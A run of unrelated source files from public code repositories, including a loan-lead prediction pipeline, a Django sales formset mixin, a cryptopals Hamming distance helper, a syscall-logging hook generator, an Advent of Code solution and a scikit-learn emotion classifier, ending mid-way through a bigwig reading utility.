'AnnualPercentageRate',\n 'Payment',\n 'MonthsSinceOpen']\n \n for col in NAs_cols:\n if (col in data.columns) and (col in imp_var.cols) :\n data[col] = data[col].fillna(0)\n \n \n mean_cols = [ 'Age',\n 'FICO5Score',\n 'FICO8Score',\n 'FICO8AutoScore',\n 'FICO9Score',\n 'FICO9AutoScore',\n 'Monthlypaymentamountofhighestmortgagetrade_1MO',\n 'Cumulativemonthlypaymentsforallopenmortgagetrades_1MO',\n 'BalanceofopenFHAloan_1MO',\n 'CumulativebalancesofopenFHAloan_1MO',\n 'AgeofmostrecentFHAmortgagetrade_1MO',\n 'AgeofmostrecentVAmortgagetrade_1MO',\n 'BalanceofopenFinanceMortgage_1MO',\n 'CumulativebalancesofopenFinanceloan_1MO',\n 'AgeofmostrecentFinancemortgagetrade_1MO',\n 'MortgageSumHighCredit',\n 'PErsonalLoanSumPayment',\n 'PErsonalLoanSumHighCredit',\n '3MonthFICO5Delta',\n '6MonthFICO5Delta',\n '12MonthFICO5Delta',\n '18MonthFICO5Delta',\n '3MonthFICOAutoDelta',\n '6MonthFICOAutoDelta',\n '12MonthFICOAutoDelta',\n '18MonthFICOAutoDelta',\n 'MonthsSinceMostRecentMortgageOpened',\n 'MortgageLTV']\n \n for col in mean_cols:\n if (col in data.columns) and (col in imp_var.cols):\n mean_value=data[col].mean()\n data[col].fillna(value=mean_value, inplace=True)\n \n \n obj_cols_to_transform = ['MailType',\n 'OpenTradeLinesAuto',\n 'MortgageWorstDelinqEverReptdStatusCodeValue',\n 'Typecodeformostrecentlyopenedmortgagetrade_1MO']\n \n for col in obj_cols_to_transform:\n col_values = data[col].unique()\n for val in col_values:\n data[col + \"_\" + str(val)] = np.where(data[col] == val, 1, 0)\n \n data = data.drop(obj_cols_to_transform, axis=1)\n \n data_validation = data[imp_var.cols]\n \n \n data_validation[['ZIPCode', 'Individual_ID']] = data[['ZIPCode', 'Individual_ID']]\n \n return data_validation\n\n\n\ndef mf_sample(data_validation):\n import sys\n import sklearn.neighbors._base\n sys.modules['sklearn.neighbors.base'] = sklearn.neighbors._base\n #pip install misspy for installation\n from missingpy import MissForest\n import pandas as pd\n import numpy as np\n \n data_validation_sample = data_validation.sample(n=1000, random_state=42)\n \n imputer = MissForest(random_state=42)\n data_imputed = imputer.fit_transform(data_validation_sample)\n \n scaled_data_for_mf = 
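# The per-column loops in data_prep above can be collapsed into vectorised
# fillna calls. A sketch under the same assumption the original makes, namely
# that imp_var exposes a 'cols' column; note that `x in series` tests the
# index, so .values is used to test membership over the column's values.
zero_cols = [c for c in NAs_cols if c in data.columns and c in imp_var.cols.values]
data[zero_cols] = data[zero_cols].fillna(0)
mean_cols_here = [c for c in mean_cols if c in data.columns and c in imp_var.cols.values]
data[mean_cols_here] = data[mean_cols_here].fillna(data[mean_cols_here].mean())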
pd.DataFrame(data_imputed, index=data_validation_sample.index, columns=data_validation_sample.columns)\n data_validation_sample[scaled_data_for_mf.columns] = scaled_data_for_mf\n \n return data_validation_sample\n\n\n\ndef dict_final(data_validation_sample):\n import pandas as pd\n\n dict_final = {'ZIPCode': data_validation_sample['ZIPCode'], 'Individual_ID': data_validation_sample['Individual_ID']}\n data_final = pd.DataFrame(dict_final)\n\n return data_final\n\ndef drop_zip_id(data_validation_sample):\n import pandas as pd\n return data_validation_sample.drop(['ZIPCode', 'Individual_ID'], axis=1)\n\ndef get_users(data_validation_sample, data_final):\n import pandas as pd\n import numpy as np\n import lightgbm as lgb\n filepath = \"../Data/TrainDataMf.csv\"\n\n train_data_mf = pd.read_csv(filepath) \n \n x_train_mf = train_data_mf.drop(['Lead Flag', 'ZIPCode'], axis=1)\n y_train_mf = train_data_mf['Lead Flag']\n \n model_mf = lgb.LGBMClassifier(learning_rate=0.1,max_depth=3,random_state=42)\n model_mf.fit(x_train_mf,y_train_mf, verbose=20)\n \n predict = model_mf.predict_proba(data_validation_sample)[:,1]\n \n data_final['Lead Flag'] = np.where(predict > 0.8, 1, 0)\n data_final['prediction'] = predict\n data_final = data_final[data_final['Lead Flag'] == 1]\n \n return data_final","repo_name":"lahanyan/Capstone","sub_path":"Validation(X6)/validation_functions.py","file_name":"validation_functions.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2679209629","text":"from django.shortcuts import redirect\nfrom django.views.generic.base import ContextMixin\nfrom django.views.generic.detail import SingleObjectMixin\nfrom .forms import VentaForm, VentaDetalleFormSet\n\nclass VentaContextMixin(ContextMixin):\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(VentaContextMixin, self).get_context_data(**kwargs)\n\t\tcontext['named_formsets'] = self.get_named_formsets()\n\t\treturn context\n\n\tdef get_named_formsets(self):\n\t\treturn {\n\t\t\t'detalle': VentaDetalleFormSet(self.request.POST or None, prefix='detalle', instance = self.object),\n\t\t}\n\n\tdef form_valid(self, form):\n\t\tnamed_formsets = self.get_named_formsets()\n\t\tif not all((x.is_valid() for x in named_formsets.values())):\n\t\t\treturn self.render_to_response(self.get_context_data(form=form))\n\t\telse:\n\t\t\tself.object = form.save()\n\n\t\tfor name, formset in named_formsets.items():\n\t\t\tformset_save_func = getattr(self, 'formset_{0}_valid'.format(name), None)\n\t\t\tif formset_save_func is not None:\n\t\t\t\tformset_save_func(formset)\n\t\t\telse:\n\t\t\t\tformset.save()\n\t\treturn redirect(self.success_url)\n\n\tdef formset_detalle_valid(self, formset):\n\t\tdetalles = formset.save(commit=False)\n\t\tprint(detalles)\n\t\tfor obj in formset.deleted_objects:\n\t\t\tobj.delete()\n\n\t\tfor detalle in detalles:\n\t\t\tprint(detalle)\n\t\t\tdetalle.venta = self.object\n\t\t\tdetalle.save()","repo_name":"jinchuika/u-seminario","sub_path":"main/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"467661009","text":"# coding: utf8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytz\nfrom datetime import date, datetime\n\nimport pytest\n\nfrom common.tester.factories import create_station\n\nfrom 
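# A plausible pairing for VentaContextMixin above: the mixin supplies the
# formset plumbing while a generic CreateView drives the form. The view name,
# template and success_url are assumptions, not part of the original module.
from django.views.generic.edit import CreateView
from .models import Venta

class VentaCreateView(VentaContextMixin, CreateView):
    model = Venta
    form_class = VentaForm
    template_name = 'venta/form.html'
    success_url = '/ventas/'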
travel.rasp.api_public.api_public.v3.station.base_scheduler import BaseScheduler\nfrom travel.rasp.api_public.api_public.v3.core.api_errors import ApiError\n\n\npytestmark = [pytest.mark.dbuser]\n\n\ndef _make_scheduler_and_check_base(station, event):\n    moscow_pytz = pytz.timezone(\"Europe/Moscow\")\n    query = {\n        \"dt\": datetime(2020, 12, 22, 0, 0, 0),\n        \"result_pytz\": moscow_pytz,\n        \"event\": event,\n        \"show_systems\": [\"yandex\"]\n    }\n    scheduler = BaseScheduler(query, station)\n    scheduler.set_event()\n\n    assert scheduler.station.id == station.id\n    assert scheduler.date == date(2020, 12, 22)\n    assert scheduler.result_pytz == moscow_pytz\n    assert scheduler.base_json[\"date\"] == date(2020, 12, 22)\n    assert scheduler.base_json[\"station\"][\"code\"] == \"s100\"\n\n    return scheduler\n\n\ndef test_base_scheduler():\n    station = create_station(id=100)\n\n    scheduler = _make_scheduler_and_check_base(\n        station, event=\"\"\n    )\n    assert scheduler.event == \"departure\"\n    assert scheduler.base_json[\"event\"] == \"departure\"\n\n    scheduler = _make_scheduler_and_check_base(station, event=\"departure\")\n    assert scheduler.event == \"departure\"\n    assert scheduler.base_json[\"event\"] == \"departure\"\n\n    scheduler = _make_scheduler_and_check_base(station, event=\"arrival\")\n    assert scheduler.event == \"arrival\"\n    assert scheduler.base_json[\"event\"] == \"arrival\"\n\n    with pytest.raises(ApiError) as ex:\n        _make_scheduler_and_check_base(station, event=\"pribitie\")\n    assert ex.value.message == \"event должен принимать значения arrival, departure или быть пустым.\"\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/v3/station/test_base_scheduler.py","file_name":"test_base_scheduler.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37208993821","text":"# Hamming Distance Function for s1c6\n\ndef hammingDistance(in1,in2):\n    dist_count = 0\n    pairedIns = zip(bytearray(in1),bytearray(in2))\n    for each_1,each_2 in pairedIns:\n        dist_count += bin(each_1^each_2).count('1')\n    return dist_count\n\n\n# Test inputs for cryptopals s1-c6 PART 1/2\n\n#x = 'this is a test'\n#y = 'wokka wokka!!!'\n\n#print hammingDistance(x,y)","repo_name":"exinmusic/py2-cryptopals","sub_path":"crypt06_1.py","file_name":"crypt06_1.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37539538236","text":"import pika\r\nimport time\r\nimport random\r\n\r\n\r\nconnection_parameters = pika.ConnectionParameters('localhost')\r\n\r\nconnection = pika.BlockingConnection(connection_parameters)\r\n\r\nchannel = connection.channel()\r\n\r\nchannel.queue_declare(queue='kursova')\r\n\r\nmessageId = 1\r\n\r\n# compose the first message before entering the loop, so the initial publish\r\n# never references an undefined name\r\nmessage = f\"Sending Message Id:{messageId}\"\r\n\r\nwhile True:\r\n\r\n    channel.basic_publish(exchange='', routing_key='kursova', body=message)\r\n\r\n    print(f\"sent message: {message}\")\r\n\r\n    time.sleep(random.uniform(1, 2))\r\n\r\n    messageId += 1\r\n\r\n    message = f\"Sending Message Id:{messageId}\"\r\n","repo_name":"Tk4V/labs","sub_path":"Kursova_robota_1/Producer.py","file_name":"Producer.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9059356919","text":"import csv\n\ndef init(s):\n    param = ''\n    while True:\n        if (s[-1] == '*' or s[-1] == ' '):\n            break\n        param = s[-1] + param\n        s = s[:-1]\n    return [s, param]\n\nwith 
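# A minimal consumer counterpart to Producer.py above, assuming the same
# local broker and the 'kursova' queue it declares (pika 1.x API):
import pika

def on_message(ch, method, properties, body):
    print(f"received: {body.decode()}")

conn = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = conn.channel()
channel.queue_declare(queue='kursova')
channel.basic_consume(queue='kursova', on_message_callback=on_message, auto_ack=True)
channel.start_consuming()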
open('syscall.txt',encoding='utf-8') as f:\n with open('hook_fuc.h', 'w+', encoding='utf-8') as fo1:\n with open('hook_sys.h', 'w+',encoding='utf-8') as fo2:\n content = csv.reader(f, delimiter=',')\n for x in content:\n sys_name = x[0]\n res = 'asmlinkage long (*real_sys_' + sys_name + ')'\n res_more = 'asmlinkage long _hook_sys_' + sys_name\n res = res + '('\n res_more = res_more + '('\n params = ''\n for i in range(1, 7):\n if (x[i] != ''):\n after_exe = init(x[i])\n res = res + after_exe[0] + ','\n res_more = res_more + x[i] + ','\n params = params + after_exe[1] + ','\n if (res[-1] == ','):\n res = res[:-1]\n if (res_more[-1] == ','):\n res_more = res_more[:-1]\n params = params[:-1]\n res = res + ');'\n res_more = res_more + \\\n ')\\n{\\n\\tprintk(KERN_ERR \"syscall:' +\\\n sys_name +\\\n '\\\\n\");\\n\\treturn real_sys_' +\\\n sys_name +\\\n '(' +\\\n params +\\\n ');'+\\\n '\\n}\\n'\n fo1.write(res+'\\n')\n fo2.write(res_more + '\\n')\n","repo_name":"mikelhpdatke/ISIHunter","sub_path":"syscall.py","file_name":"syscall.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37503320260","text":"class Moon():\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n self.vx = 0\n self.vy = 0\n self.vz = 0\n\n def apply_gravity(self, moon):\n self.vx += Moon.gravity_change(self.x, moon.x)\n self.vy += Moon.gravity_change(self.y, moon.y)\n self.vz += Moon.gravity_change(self.z, moon.z)\n\n def move(self):\n self.x += self.vx\n self.y += self.vy\n self.z += self.vz\n\n def potential_energy(self):\n return abs(self.x) + abs(self.y) + abs(self.z)\n\n def kinetic_energy(self):\n return abs(self.vx) + abs(self.vy) + abs(self.vz)\n\n def total_energy(self):\n return self.potential_energy() * self.kinetic_energy()\n\n def __str__(self):\n return f\"({self.x}, {self.y}, {self.z}) -> <{self.vx}, {self.vy}, {self.vz}>\"\n\n @staticmethod\n def gravity_change(x1, x2):\n if x1 == x2:\n return 0\n return 1 if x1 < x2 else -1\n\n\ndef apply_gravitys(moon, rest):\n for another in rest:\n moon.apply_gravity(another)\n\n\nmoons = [\n Moon(13, -13, -2),\n Moon(16, 2, -15),\n Moon(7, -18, -12),\n Moon(-3, -8, -8)\n]\n\nnum_steps = 1000\n# num_steps = 10\n\n# moons = [\n# Moon(-1, 0, 2),\n# Moon(2, -10, -7),\n# Moon(4, -8, 8),\n# Moon(3, 5, -1)\n# ]\n\nfor step in range(num_steps):\n for moon in moons:\n apply_gravitys(moon, moons)\n\n for moon in moons:\n moon.move()\n\nmoons_energy = [m.total_energy() for m in moons]\n\nprint(sum(moons_energy))\n","repo_name":"wpedrak/advent_of_code","sub_path":"2019/12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14372757992","text":"import sys\nimport numpy\nimport numpy as np\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport json\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import tree\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\n\n# Task 2.1\n# Printing the whole array (without dots)\nnumpy.set_printoptions(threshold=sys.maxsize)\ndata_list = json.load(open('goemotions.json', 'r'))\n\nparametersNB = {\n 'alpha': (0.5, 0, 2, 1, 2.5, 1.5)\n}\nparametersDT = {\n 'criterion': [\"gini\"],\n 'max_depth': (10, 20),\n 'min_samples_split': (2, 3, 4)\n}\nparametersMLP = {\n 
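# A hedged check of the Moon class above with two bodies; the positions are
# taken from the commented example set in the same file.
m1, m2 = Moon(-1, 0, 2), Moon(2, -10, -7)
m1.apply_gravity(m2)
m2.apply_gravity(m1)
m1.move()
m2.move()
print(m1)  # (0, -1, 1) -> <1, -1, -1>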
'activation': ('identity', 'logistic', 'tanh', 'relu'),\n 'solver': ('sgd', 'adam'),\n 'hidden_layer_sizes': [(30, 50), (10, 10, 10)],\n 'max_iter': [1]\n}\n# convert the list into 2D Array\narrayData = np.array(data_list)\npromptArray = []\n\n# Separate prompt from Emo. & Sent.\nfor x in arrayData:\n promptArray.append(x[0])\n\n# Get the total words count\ncorpus = np.array(promptArray)\nvectorizer = CountVectorizer()\nX = vectorizer.fit_transform(corpus)\n\n# print(vectorizer.get_feature_names_out())\n# print()\n# print(\"Total word vocabulary: \", len(vectorizer.get_feature_names_out()))\n# print()\n##################################################################################\n\n# Task 2.2\ntraining_data, testing_data = train_test_split(arrayData, test_size=0.2, random_state=75)\n\n# print(f\"No. of training examples: {training_data.shape[0]}\")\n# print(f\"No. of testing examples: {testing_data.shape[0]}\")\n\n##################################################################################\n\n# Task 2.3\nprompt_trainingData = []\nsentiment_trainingData = []\nemotions_trainingData = []\n\nprompt_testingData = []\nsentiment_testingData = []\nemotions_testingData = []\n\nfor x in training_data:\n prompt_trainingData.append(x[0])\n sentiment_trainingData.append(x[2])\n emotions_trainingData.append(x[1])\n\nfor x in testing_data:\n prompt_testingData.append(x[0])\n sentiment_testingData.append(x[2])\n emotions_testingData.append(x[1])\n\n# print(prompt_trainingData)\n# print(sentiment_trainingData)\n# print(emotions_trainingData)\n\n### Initialization of Classifiers Parameters ###\n# Create a NumPy array objects\ncorpusPrompt = np.array(prompt_trainingData)\ncorpusSentiment = np.array(sentiment_trainingData)\ncorpusEmotion = np.array(emotions_trainingData)\n#\nXprompt = vectorizer.fit_transform(corpusPrompt)\nySentiment = corpusSentiment\nyEmotion = corpusEmotion\nprompt_testData = vectorizer.transform(np.array(prompt_testingData))\n\n# MNB Classifier\nclassifier = MultinomialNB()\n\n# DT Classifier\ndtc = tree.DecisionTreeClassifier()\n\n\n# # MLP Classifier\nmlp_sentiment = MLPClassifier(max_iter=1)\nmlp_emotion = MLPClassifier(max_iter=1)\n\n\n# Task 2.3.1 (MNB)\ndef base_MNB():\n # modelNB_sentiment = classifier.fit(Xprompt, ySentiment)\n modelNB_emotions = classifier.fit(Xprompt, yEmotion)\n\n # predict_sentiment = modelNB_sentiment.predict(prompt_testData)\n predict_emotion = modelNB_emotions.predict(prompt_testData)\n\n print(predict_emotion)\n # print(emotions_testingData)\n\n\n# Task 2.3.2 (DT)\n\ndef base_DT():\n modelTree_sentiment = dtc.fit(Xprompt, ySentiment)\n modelTree_emotion = dtc.fit(Xprompt, yEmotion)\n\n treePredict_sentiment = modelTree_sentiment.predict(prompt_testData)\n treePredict_emotion = modelTree_emotion.predict(prompt_testData)\n\n print(treePredict_emotion)\n print(treePredict_sentiment)\n print(sentiment_testingData)\n\n# Task 2.3.3 (MLP) --> not accurate\n\ndef base_MLP():\n\n modelMLP_sentiment = mlp_sentiment.fit(Xprompt, ySentiment)\n modelMLP_emotion = mlp_emotion.fit(Xprompt, yEmotion)\n\n mlpPredict_sentiment = modelMLP_sentiment.predict(prompt_testData)\n mlpPredict_emotion = modelMLP_emotion.predict(prompt_testData)\n\n print(mlpPredict_emotion)\n print(mlpPredict_sentiment)\n print(emotions_testingData)\n\n\n# Task 2.3.4 (TOP MNB) --> Not accurate Warning because of alpha value = 0 in parameters\n\ndef top_MNB():\n gridTopMNB_sentiment = GridSearchCV(classifier, parametersNB)\n gridTopMNB_emotion = GridSearchCV(classifier, parametersNB)\n\n 
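# After any of the grid searches in this file are fitted, the chosen settings
# can be inspected; a short sketch reusing this file's names (cv=5 is an
# assumption, matching scikit-learn's default):
gs = GridSearchCV(MultinomialNB(), parametersNB, cv=5)
gs.fit(Xprompt, ySentiment)
print(gs.best_params_, round(gs.best_score_, 3))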
modelTopMNB_sentiment = gridTopMNB_sentiment.fit(Xprompt, ySentiment)\n modelTopMNB_emotion = gridTopMNB_emotion.fit(Xprompt, yEmotion)\n\n predictTopMNB_sentiment = modelTopMNB_sentiment.predict(prompt_testData)\n predictTopMNB_emotion = modelTopMNB_emotion.predict(prompt_testData)\n\n print(predictTopMNB_sentiment)\n print(predictTopMNB_emotion)\n print(emotions_testingData)\n print(sentiment_testingData)\n\n\n# Task 2.3.5 (TOP DT) --> Not accurate and takes a lot of time 7aywan\n\ndef top_DT():\n gridTopDT_sentiment = GridSearchCV(dtc, parametersDT)\n gridTopDT_emotion = GridSearchCV(dtc, parametersDT)\n\n modelTopDT_sentiment = gridTopDT_sentiment.fit(Xprompt, ySentiment)\n modelTopDT_emotion = gridTopDT_emotion.fit(Xprompt, yEmotion)\n\n predictTopDT_sentiment = modelTopDT_sentiment.predict(prompt_testData)\n predictTopDT_emotion = modelTopDT_emotion.predict(prompt_testData)\n\n print(predictTopDT_sentiment)\n print(predictTopDT_emotion)\n print(emotions_testingData)\n print(sentiment_testingData)\n\n\n# Task 2.3.6 (TOP MLP)\n\ndef top_MLP():\n gridTopMLP_sentiment = GridSearchCV(mlp_sentiment, parametersMLP)\n gridTopMLP_emotion = GridSearchCV(mlp_emotion, parametersMLP)\n\n modelTopMLP_sentiment = gridTopMLP_sentiment.fit(Xprompt, ySentiment)\n modelTopMLP_emotion = gridTopMLP_emotion.fit(Xprompt, yEmotion)\n\n predictTopMLP_sentiment = modelTopMLP_sentiment.predict(prompt_testData)\n predictTopMLP_emotion = modelTopMLP_emotion.predict(prompt_testData)\n\n print(predictTopMLP_sentiment)\n print(predictTopMLP_emotion)\n print(emotions_testingData)\n print(sentiment_testingData)\n\n\n##################################################################################\n\n# Task 2.5 (Different Splits)\ntraining_data1, testing_data1 = train_test_split(arrayData, test_size=0.4, random_state=75)\nprompt_trainingData1 = []\nsentiment_trainingData1 = []\nemotions_trainingData1 = []\n\nprompt_testingData1 = []\nsentiment_testingData1 = []\nemotions_testingData1 = []\n\nfor x in training_data1:\n prompt_trainingData1.append(x[0])\n sentiment_trainingData1.append(x[2])\n emotions_trainingData1.append(x[1])\n\nfor x in testing_data1:\n prompt_testingData1.append(x[0])\n sentiment_testingData1.append(x[2])\n emotions_testingData1.append(x[1])\n\n### Initialization of Classifiers Parameters ###\n# Create a NumPy array objects\ncorpusPrompt1 = np.array(prompt_trainingData1)\ncorpusSentiment1 = np.array(sentiment_trainingData1)\ncorpusEmotion1 = np.array(emotions_trainingData1)\nXprompt1 = vectorizer.fit_transform(corpusPrompt1)\nySentiment1 = corpusSentiment1\nyEmotion1 = corpusEmotion1\nprompt_testData1 = vectorizer.transform(np.array(prompt_testingData1))\n\n# MNB Classifier\nclassifier1 = MultinomialNB()\n\n# DT Classifier\ndtc1 = tree.DecisionTreeClassifier()\n\n# MLP Classifier\nmlp_sentiment1 = MLPClassifier(max_iter=1)\nmlp_emotion1 = MLPClassifier(max_iter=1)\n\n\n# 2.5 (Naive-Bayes)\ndef base_MNB1():\n modelNB_sentiment1 = classifier1.fit(Xprompt1, ySentiment1)\n modelNB_emotions1 = classifier1.fit(Xprompt1, yEmotion1)\n\n predict_sentiment1 = modelNB_sentiment1.predict(prompt_testData1)\n predict_emotion1 = modelNB_emotions1.predict(prompt_testData1)\n\n print(predict_emotion1)\n print(predict_sentiment1)\n print(emotions_testingData1)\n\n# 2.5 (DT)\ndef base_DT1():\n modelTree_sentiment1 = dtc1.fit(Xprompt1, ySentiment1)\n modelTree_emotion1 = dtc1.fit(Xprompt1, yEmotion1)\n\n treePredict_sentiment1 = modelTree_sentiment1.predict(prompt_testData1)\n treePredict_emotion1 = 
modelTree_emotion1.predict(prompt_testData1)\n\n print(treePredict_sentiment1)\n print(treePredict_emotion1)\n print(sentiment_testingData1)\n\n\n# Task 2.5 (MLP)\n\ndef base_MLP1():\n modelMLP_sentiment1 = mlp_sentiment1.fit(Xprompt1, ySentiment1)\n modelMLP_emotion1 = mlp_emotion1.fit(Xprompt1, yEmotion1)\n\n mlpPredict_sentiment1 = modelMLP_sentiment1.predict(prompt_testData1)\n mlpPredict_emotion1 = modelMLP_emotion1.predict(prompt_testData1)\n\n print(mlpPredict_emotion1)\n print(mlpPredict_sentiment1)\n print(emotions_testingData1)\n\n\n# Task 2.5 (TOP MNB)\n\ndef top_MNB1():\n gridTopMNB_sentiment1 = GridSearchCV(classifier, parametersNB)\n gridTopMNB_emotion1 = GridSearchCV(classifier1, parametersNB)\n\n modelTopMNB_sentiment1 = gridTopMNB_sentiment1.fit(Xprompt, ySentiment)\n modelTopMNB_emotion1 = gridTopMNB_emotion1.fit(Xprompt1, yEmotion1)\n\n predictTopMNB_sentiment1 = modelTopMNB_sentiment1.predict(prompt_testData)\n predictTopMNB_emotion1 = modelTopMNB_emotion1.predict(prompt_testData1)\n\n print(predictTopMNB_sentiment1)\n print(predictTopMNB_emotion1)\n print(emotions_testingData1)\n print(sentiment_testingData1)\n\n\n# Task 2.5 (TOP DT)\n\ndef top_DT1():\n gridTopDT_sentiment1 = GridSearchCV(dtc1, parametersDT)\n gridTopDT_emotion1 = GridSearchCV(dtc1, parametersDT)\n\n modelTopDT_sentiment1 = gridTopDT_sentiment1.fit(Xprompt, ySentiment)\n modelTopDT_emotion1 = gridTopDT_emotion1.fit(Xprompt1, yEmotion1)\n\n predictTopDT_sentiment1 = modelTopDT_sentiment1.predict(prompt_testData)\n predictTopDT_emotion1 = modelTopDT_emotion1.predict(prompt_testData1)\n\n print(predictTopDT_sentiment1)\n print(predictTopDT_emotion1)\n print(emotions_testingData1)\n print(sentiment_testingData1)\n\n\n# Task 2.5 (TOP MLP)\n\ndef top_MLP1():\n gridTopMLP_sentiment1 = GridSearchCV(mlp_sentiment1, parametersMLP)\n gridTopMLP_emotion1 = GridSearchCV(mlp_emotion1, parametersMLP)\n\n modelTopMLP_sentiment1 = gridTopMLP_sentiment1.fit(Xprompt1, ySentiment1)\n modelTopMLP_emotion1 = gridTopMLP_emotion1.fit(Xprompt1, yEmotion1)\n\n predictTopMLP_sentiment1 = modelTopMLP_sentiment1.predict(prompt_testData1)\n predictTopMLP_emotion1 = modelTopMLP_emotion1.predict(prompt_testData1)\n\n print(predictTopMLP_sentiment1)\n print(predictTopMLP_emotion1)\n print(emotions_testingData1)\n print(sentiment_testingData1)\n\n# Menu Selection\ndef menu(choice = None):\n print(\"************Welcome to Task-2 AI Classifier Demo**************\")\n while choice != -1:\n choice = int(input(\"\"\"\n 1: Base-MNB\n 2: Base-DT\n 3: Base-MLP\n 4: Top-MNB\n 5: Top-DT\n 6: Top-MLP\n For Different Splits, please choose an option:\n 7: Base-MNB\n 8: Base-DT\n 9: Base-MLP\n 10: Top-MNB\n 11: Top-DT\n 12: Top-MLP\n 13: Exit\n\n Please enter your classifier choice: \"\"\"))\n if choice == 1:\n base_MNB()\n elif choice == 2:\n base_DT()\n elif choice == 3:\n base_MLP()\n elif choice == 4:\n top_MNB()\n elif choice == 5:\n top_DT()\n elif choice == 6:\n top_MLP()\n elif choice == 7:\n base_MNB1()\n elif choice == 8:\n base_DT1()\n elif choice == 9:\n base_MLP1()\n elif choice == 10:\n top_MNB1()\n elif choice == 11:\n top_DT1()\n elif choice == 12:\n top_MLP1()\n elif choice == 13:\n sys.exit()\n else:\n print(\"You must only select a number from 1 to 13, so please try again\")\n choice = int(input(\"Please re-enter your choice: \"))\n# Start the 
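# A pitfall worth noting in base_MNB/base_DT above: calling fit twice on one
# estimator discards the first fit, so the "sentiment" and "emotion" models
# end up identical. A corrected sketch with separate instances:
dtc_sent = tree.DecisionTreeClassifier()
dtc_emo = tree.DecisionTreeClassifier()
sent_pred = dtc_sent.fit(Xprompt, ySentiment).predict(prompt_testData)
emo_pred = dtc_emo.fit(Xprompt, yEmotion).predict(prompt_testData)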
Menu\nmenu()\n","repo_name":"A-BAKLEH/AI-Project","sub_path":"MP1/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":11591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70421147432","text":"import numpy as np\nimport glob, os\nimport pyBigWig\nfrom .l0approximator.poissonfunctions import l0poissonapproximateCondensed, l0poissonbreakpoint\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom distinctipy import distinctipy\n\ndef _read_bed(path):\n '''\n Read the content of a bed file\n path: the path to a bed file\n '''\n with open(path,'r') as file:\n data = file.readlines()\n data = [i.split() for i in data]\n chrs = [i[0] for i in data]\n s = [int(i[1]) for i in data]\n e = [int(i[2]) for i in data]\n return chrs, s, e\n\ndef _read_from_bigwig(vec, path, chr, start, end):\n '''\n Read from a bigwig file\n vec: vec is an array that is overwritten with the values from bigwig.\n path: path of the bigwig file\n chr: chromosome number.\n start: starting index in the chromosome number.\n end: ending index in the chromosome number.\n '''\n with pyBigWig.open(path) as bigwig:\n vec[:(end-start)] = np.array(bigwig.values(chr,start,end))\n np.nan_to_num(vec,copy=False,nan=0)\n\ndef mean_nan_to_zero(arr):\n mask = np.isnan(arr)\n if np.all(mask):\n return 0\n else:\n return np.nanmean(arr)*np.sum(~np.isnan(arr))/len(arr)\n\ndef _read_from_bigwig_breakpoints(vec, path, chr, start, end, bps):\n '''\n Read from a bigwig file\n vec: vec is an array that is overwritten with the values from bigwig.\n path: path of the bigwig file\n chr: chromosome number.\n start: starting index in the chromosome number.\n end: ending index in the chromosome number.\n '''\n with pyBigWig.open(path) as bigwig:\n if len(bps) == 0:\n vec[0] = mean_nan_to_zero(bigwig.values(chr,start,end))\n else:\n vec[0] = mean_nan_to_zero(bigwig.values(chr,start,bps[0]))\n for i in range(len(bps)-1):\n arr = bigwig.values(chr,bps[i],bps[i+1])\n vec[i+1] = mean_nan_to_zero(bigwig.values(chr,bps[i],bps[i+1]))\n vec[len(bps)] = mean_nan_to_zero(bigwig.values(chr,bps[-1],end))\n\ndef _read_from_bigwig_binned(vec, path, chr, start, end, bin_size):\n '''\n Read from a bigwig file and return binned values\n vec: vec is an array that is overwritten with the values from bigwig.\n path: path of the bigwig file\n chr: chromosome number.\n start: starting index in the chromosome number.\n end: ending index in the chromosome number.\n bin_size: size of the bins.\n '''\n with pyBigWig.open(path) as bigwig:\n vals = np.array(bigwig.values(chr,start,end))\n np.nan_to_num(vals,copy=False,nan=0)\n if len(vals) % bin_size == 0:\n vec[:] = vals.reshape(-1,bin_size).mean(axis=1)\n else:\n vec[:-1] = vals[:int(bin_size * (len(vec)-1))].reshape(-1,bin_size).mean(axis=1)\n vec[-1] = vals[int(bin_size * (len(vec)-1)):].mean()\n #vec[:] = np.pad(vals, (0, bin_size - len(vals) % bin_size)).reshape(-1,bin_size).mean(axis=1) \n\ndef _read_from_bigwig_sampled(vec, path, chr, start, end, bin_size):\n with pyBigWig.open(path) as bigwig:\n vals = np.array(bigwig.values(chr,start,end))\n vec[:] = vals[::bin_size]\n np.nan_to_num(vec, copy=False, nan=0)\n\ndef _read_dict(path):\n with open(path, 'r') as file:\n data = file.readlines()\n data = [i.strip().split() for i in data]\n data = {i[0]:int(i[1]) for i in data}\n return data\n\ndef _read_arr(path):\n with open(path, 'r') as file:\n data = file.readlines()\n data = [float(i) for i in data]\n return data\n\ndef 
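# Rather than printing raw prediction arrays as task2.py above does, the
# held-out labels can be scored directly; a hedged sketch reusing that
# file's variables:
from sklearn.metrics import classification_report
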